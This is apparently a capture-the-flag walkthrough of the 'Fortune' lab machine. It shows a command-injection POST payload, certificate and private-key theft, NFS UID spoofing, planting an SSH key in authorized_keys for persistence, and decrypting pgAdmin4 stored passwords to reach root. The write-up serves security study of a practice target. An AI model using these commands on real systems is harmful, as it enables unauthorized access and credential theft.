After visiting port 80 I am greeted with this interesting page
I try a few submissions and I notice nothing of interest so I attempt malicious POST requests in addition to the radiobox option chosen. The vulnerability does appear to be remote code execution which was discovered by adding a semicolon to finish the command and execute a new one
curl -X POST -d 'db=fortunes;id' http://10.10.10.127/select
I get the more random information alongside the results of my 'id' command output
Unfortunately, more than 6 reverse shell methods did not work, potentially due to firewall settings. As much as I like to use Burpsuite or cURL to continue my commands, navigating an operating system is not going to be fun while repeating the same request and substituting the POST data. I initially attempted to look for private keys in the home directories but as I did not have permissions to access them, I decided to write my own psuedo-shell script in Python with an exfiltration command to save files of interest
And to continue my reconnaissance I scout the home directories
ls -Rlash /home
I discover an interesting certificate authority directory in bob's home directory which is filled with certificates and private keys. Remembering port 443 being open, I decide to check from my machine if client browser certificates are required for that service
openssl s_client -connect 10.10.10.127:443
Verify return code: 20 (unable to get local issuer certificate)
And that confirms my theory. So I need to grab a certificate and private key pair to see what is being served on port 443.
During my enumeration I discovered user accounts with shells
After some browsing I discover the pair that I can read so I save them locally using my script (shell.py)
I should be able to use these as is but for a browser such as Firefox, their format needs to be converted from PEM to PKCS12 locally
openssl pkcs12 -export -inkey intermediate.key.pem -in intermediate.cert.pem -out intermediate.pkcs12.pfx
Firefox -> Preferences -> Search -> Certificates -> View Certificates -> Your Certificates -> Import -> intermediate.pkcs12.pfxhttps://10.10.10.127
You will need to use the local authpf service to obtain elevated network access. If you do not already have the appropriate SSH key pair, then you will need to generate one and configure your local system appropriately to proceed.
Being in a mood for scripting, I decided to make a script to save the private key from the generation page rather than: copy to clipboard -> remove new lines (\n) -> save to a file -> change file permissions for my OpenSSH client to not complain about the key being too accessible
I attempt to use this key for all accounts but it is only authorized for the nfsuser account
ssh -i exported-id_rsa email@example.com
This is not really a shell as I saw in the passwd file. This tunnel elevates my network privileges. Essentially, I now have access to more ports that were previously inaccessible to unauthenticated users
The NFS service is now "unlocked".
I did not have the packages for common NFS tools installed on my Kali machine
apt install -y nfs-common
To see mounted NFS directories
showmount -e 10.10.10.127
Export list for 10.10.10.127:
To mount the /home shared directory
mount -t nfs 10.10.10.127:/home fortunehome
To un-mount (when the directory is no longer needed later on)
umount -lf fortunehome
ls -la fortunehome
drwxr-x--- 3 1000 1000 512 Nov 5 2018 charlie
Network shares on Linux sometimes have a serious security issue as they may not verify permissions on the mounted-end. What I mean is that any user that has mounted this directory with a UID of 1000 or GID of 1000 has access to this directory even if that user account with the same UID does not exist on the server with the NFS service running
If you have a user account with a UID of 1000 you can change to that user to access Charlie's home directory
su $(grep ':1000:1000:' /etc/passwd | cut -d ':' -f1)
I do not have any users on my local computer with that UID (1000 and above are normal user accounts) so I have to make one
useradd --uid 1000 --shell /bin/bash evilcharlie
At this point, I have access to Charlie's home directory so I am able to establish a solid foothold by whitelisting my SSH public key and using the private key assocaited with that public key to login as Charlie
cat ~/.ssh/id_rsa.pub >> fortunehome/charlie/.ssh/authorized_keys
ssh -i ~/.ssh/id_rsa firstname.lastname@example.org
Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.
This message from Bob gives me a hint to obtain root. I would have to crack the local PostgreSQL server's dba account's password or find it being used in a script/configuration file somewhere.
I decided to narrow down my search
find / -name 'pgadmin4' -ls 2>/dev/null
Of the entries found, this was one that stood out to me
ls -la /var/appsrv/pgadmin4
I found what appears to be a database file
I decide to grab this database file from my machine
scp -i ~/.ssh/id_rsa email@example.com:/var/appsrv/pgadmin4/pgadmin4.db pgadmin4.db
One good tool to browse database files is DB Browser for SQLite which is already installed on my Kali machine
I noticed three tables that were interesting while browsing the data
I attempt to crack those hashes using hashcat, but as I did not quickly discover the password in a common password list such as rockyou.txt, I decided that was not the route to privilege escalation. The next option was to find a way to decrypt those ciphertexts using the information available.
The other directory that stood out to me in that find command was this one
This tool's source code appears to be publicly available on Github after I discovered a README file so I decided to download it to my machine
git clone https://github.com/postgres/pgadmin4
I decide to find the component used for encryption in this application
egrep -Ril 'encrypt|decrypt' pgadmin4
This File Provides Cryptography.
Well that was quick!
def encrypt(plaintext, key)
def decrypt(ciphertext, key)
I decide to try both PBKDF2 SHA512 hashes I found earlier as the key, as hashing algorithms are often used to store password's hashes and those hashes are often used in the encryption process. Bob's user hash had a successful trial.
Here is a simplified example in psuedo-code if you are not familiar or comfortable with Cryptography.
AES encrypt('Password123', SHA256('Some other secret password'))
Which translates to
AES encrypt('Password123', '720d7aba7095f0269ee2e314350ee00433bb3d579b4b5775bed4260b81373367')
Which outputs the ciphertext of
As AES is a symmetric-key algorithm, it can be decrypted with the correct key
While outputs the plaintext of
So I decided to grab only the required functions for decryption and put them in a quick script
As Bob mentioned in his note to Charlie, the PostgreSQL password is the same as the root password
cat /home/charlie/user.txt /root/root.txt
I had a lot of fun writing scripts for this machine. I hope you enjoyed it as much as i did! :)Thanks for this cool box AuxSarge!